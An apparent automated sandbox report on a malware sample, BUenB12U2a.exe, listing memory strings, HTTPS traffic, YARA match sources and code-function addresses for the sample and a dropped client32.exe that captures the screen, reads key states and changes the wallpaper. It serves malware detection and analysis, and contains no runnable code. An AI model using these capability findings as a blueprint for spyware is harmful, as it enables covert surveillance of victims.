                                Source: BUenB12U2a.exe, 00000001.00000003.1751169430.0000020E473C0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2016444469.0000020E473D2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007672696.0000020E473D0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2013768792.0000020E473D1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2017879301.0000020E473D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
                                Source: BUenB12U2a.exe, 00000001.00000003.2012932665.0000020E47299000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008347211.0000020E47252000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
                                Source: BUenB12U2a.exe, 00000000.00000003.1720981350.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720981350.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720981350.000001E234153000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1721086033.000001E234154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                                Source: BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2043004742.00007FFDFB09A000.00000002.00000001.01000000.00000010.sdmp, BUenB12U2a.exe, 00000001.00000002.2043368746.00007FFDFB16F000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.openssl.org/H
                                Source: BUenB12U2a.exe, 00000001.00000003.1750148610.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1748663176.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746826345.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1744363937.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                                Source: BUenB12U2a.exe, 00000001.00000003.1790538475.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2014555113.0000020E4785B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011743711.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751007347.0000020E4783B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795769765.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751205141.0000020E477BF000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006155936.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792155836.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792680194.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E47853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                                Source: BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46BB0000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740385643.0000020E47079000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740445869.0000020E4705C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                Source: BUenB12U2a.exe, 00000001.00000002.2044046675.00007FFDFB5A0000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/
                                Source: BUenB12U2a.exe, 00000001.00000003.2005546554.0000020E479B0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004607939.0000020E479AE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004252258.0000020E4797B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980407801.0000020E47979000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004575303.0000020E479A0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980198885.0000020E47975000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
                                Source: BUenB12U2a.exe, 00000001.00000002.2040252451.0000020E48098000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980198885.0000020E47975000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004767997.0000020E48097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                                Source: BUenB12U2a.exe, 00000001.00000003.2005546554.0000020E479B0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004607939.0000020E479AE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004252258.0000020E4797B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004575303.0000020E479A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/p
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD54F10 _calloc,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,_malloc,_calloc,Sleep,GetTickCount,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetTickCount,WaitForSingleObject,_memset,_memset,_malloc,_malloc,_memset,_calloc,_calloc,GetSystemPaletteEntries,GetStockObject,SelectPalette,SelectPalette,SelectPalette,RealizePalette,_memset,SelectPalette,DeleteObject,CreatePalette,SelectPalette,RealizePalette,BitBlt,GetObjectA,GetBitmapBits,GetDIBits,_malloc,_free,GetTickCount,GetTickCount,WaitForSingleObject,GetTickCount,WaitForSingleObject,GetTickCount,CloseHandle,_free,_free,_free,_free,SelectObject,DeleteObject,DeleteObject,SelectPalette,DeleteObject,DeleteDC,ReleaseDC,_free,_free,_free,6_2_6CD54F10
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD44940 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,6_2_6CD44940
                                Source: Yara matchFile source: 9.2.client32.exe.6cde0658.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6cde0658.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.client32.exe.6cde0658.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.20e488e6cb8.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.20e48086cf8.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.client32.exe.6cc40000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6cc40000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.6cc40000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1967653135.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: BUenB12U2a.exe PID: 6284, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3452, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 1868, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD46980 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,6_2_6CD46980
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD46820: GetModuleFileNameA,GetShortPathNameA,CreateFileA,CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,6_2_6CD46820
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA110000_2_00007FF76CA11000
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA369D40_2_00007FF76CA369D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA309380_2_00007FF76CA30938
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA18BD00_2_00007FF76CA18BD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA35C700_2_00007FF76CA35C70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA21DC40_2_00007FF76CA21DC4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA25DA00_2_00007FF76CA25DA0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA236100_2_00007FF76CA23610
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA2E5E00_2_00007FF76CA2E5E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1AD1D0_2_00007FF76CA1AD1D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA29F100_2_00007FF76CA29F10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA35EEC0_2_00007FF76CA35EEC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA21FD00_2_00007FF76CA21FD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA217B00_2_00007FF76CA217B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA397980_2_00007FF76CA39798
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA288040_2_00007FF76CA28804
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA2DF600_2_00007FF76CA2DF60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA318E40_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA198700_2_00007FF76CA19870
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA221D40_2_00007FF76CA221D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA219B40_2_00007FF76CA219B4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA23A140_2_00007FF76CA23A14
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA281540_2_00007FF76CA28154
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA3411C0_2_00007FF76CA3411C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA2DACC0_2_00007FF76CA2DACC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA21BC00_2_00007FF76CA21BC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1A34B0_2_00007FF76CA1A34B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1A4E40_2_00007FF76CA1A4E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA364880_2_00007FF76CA36488
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA309380_2_00007FF76CA30938
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA22C800_2_00007FF76CA22C80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA33C800_2_00007FF76CA33C80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA110001_2_00007FF76CA11000
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA369D41_2_00007FF76CA369D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA35C701_2_00007FF76CA35C70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA21DC41_2_00007FF76CA21DC4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA25DA01_2_00007FF76CA25DA0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA236101_2_00007FF76CA23610
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA2E5E01_2_00007FF76CA2E5E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA1AD1D1_2_00007FF76CA1AD1D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA29F101_2_00007FF76CA29F10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA35EEC1_2_00007FF76CA35EEC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA21FD01_2_00007FF76CA21FD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA217B01_2_00007FF76CA217B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA397981_2_00007FF76CA39798
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA288041_2_00007FF76CA28804
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA2DF601_2_00007FF76CA2DF60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA318E41_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA198701_2_00007FF76CA19870
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA221D41_2_00007FF76CA221D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA219B41_2_00007FF76CA219B4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA23A141_2_00007FF76CA23A14
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA281541_2_00007FF76CA28154
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA309381_2_00007FF76CA30938
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA3411C1_2_00007FF76CA3411C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA2DACC1_2_00007FF76CA2DACC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA18BD01_2_00007FF76CA18BD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA21BC01_2_00007FF76CA21BC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA1A34B1_2_00007FF76CA1A34B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA1A4E41_2_00007FF76CA1A4E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA364881_2_00007FF76CA36488
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA309381_2_00007FF76CA30938
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA22C801_2_00007FF76CA22C80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA33C801_2_00007FF76CA33C80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA918901_2_00007FFDFAA91890
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1AD71_2_00007FFDFB0B1AD7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB129B301_2_00007FFDFB129B30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B21DF1_2_00007FFDFB0B21DF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B15461_2_00007FFDFB0B1546
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B15961_2_00007FFDFB0B1596
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1EDD1_2_00007FFDFB0B1EDD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1D8E1_2_00007FFDFB0B1D8E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D5CF01_2_00007FFDFB0D5CF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1CBC1_2_00007FFDFB0B1CBC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F93701_2_00007FFDFB0F9370
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1FD71_2_00007FFDFB0B1FD7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B155A1_2_00007FFDFB0B155A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FD2F01_2_00007FFDFB0FD2F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C70B01_2_00007FFDFB0C70B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F57701_2_00007FFDFB0F5770
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FD7C01_2_00007FFDFB0FD7C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DB7001_2_00007FFDFB0DB700
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B24D71_2_00007FFDFB0B24D7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B149C1_2_00007FFDFB0B149C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B117C1_2_00007FFDFB0B117C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B16181_2_00007FFDFB0B1618
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B26121_2_00007FFDFB0B2612
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B26FD1_2_00007FFDFB0B26FD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B143D1_2_00007FFDFB0B143D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B13DE1_2_00007FFDFB0B13DE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B17F81_2_00007FFDFB0B17F8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B21C11_2_00007FFDFB0B21C1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1C121_2_00007FFDFB0B1C12
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0E83F01_2_00007FFDFB0E83F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1B541_2_00007FFDFB0B1B54
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B116D1_2_00007FFDFB0B116D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB1226E01_2_00007FFDFB1226E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B16FE1_2_00007FFDFB0B16FE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B86301_2_00007FFDFB0B8630
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A0F1_2_00007FFDFB0B1A0F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB11C5301_2_00007FFDFB11C530
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB769BE01_2_00007FFDFB769BE0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB83AC5C1_2_00007FFDFB83AC5C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7C94501_2_00007FFDFB7C9450
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB76B3111_2_00007FFDFB76B311
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB79DB301_2_00007FFDFB79DB30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB79C3301_2_00007FFDFB79C330
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7753441_2_00007FFDFB775344
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7A03401_2_00007FFDFB7A0340
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB76EAC01_2_00007FFDFB76EAC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB764A001_2_00007FFDFB764A00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7762201_2_00007FFDFB776220
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB79E9601_2_00007FFDFB79E960
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB76C1741_2_00007FFDFB76C174
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB76F1B01_2_00007FFDFB76F1B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7659201_2_00007FFDFB765920
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7619401_2_00007FFDFB761940
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7B10701_2_00007FFDFB7B1070
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB76C8901_2_00007FFDFB76C890
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7BF8A81_2_00007FFDFB7BF8A8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7758A41_2_00007FFDFB7758A4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7788A01_2_00007FFDFB7788A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7700B01_2_00007FFDFB7700B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB76B8D01_2_00007FFDFB76B8D0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7FB8281_2_00007FFDFB7FB828
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7ED0581_2_00007FFDFB7ED058
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7787601_2_00007FFDFB778760
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB767F801_2_00007FFDFB767F80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB77CFB01_2_00007FFDFB77CFB0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB776FC01_2_00007FFDFB776FC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7657201_2_00007FFDFB765720
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB769ED01_2_00007FFDFB769ED0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB76A6A01_2_00007FFDFB76A6A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7F36D81_2_00007FFDFB7F36D8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB769ED01_2_00007FFDFB769ED0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_107021306_2_10702130
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_1070698F6_2_1070698F
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_107036C06_2_107036C0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C998F806_2_6C998F80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9C0F536_2_6C9C0F53
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9C1F406_2_6C9C1F40
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9B19B06_2_6C9B19B0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9C1B586_2_6C9C1B58
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9C76936_2_6C9C7693
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9C17866_2_6C9C1786
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9917606_2_6C991760
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C99C0906_2_6C99C090
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9A63A06_2_6C9A63A0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9C13E86_2_6C9C13E8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9913106_2_6C991310
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB96E286_2_6CB96E28
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB96E246_2_6CB96E24
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBF6E186_2_6CBF6E18
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBB09196_2_6CBB0919
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC109156_2_6CC10915
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBCEB1A6_2_6CBCEB1A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB984686_2_6CB98468
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA45AE6_2_6CBA45AE
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC267FF6_2_6CC267FF
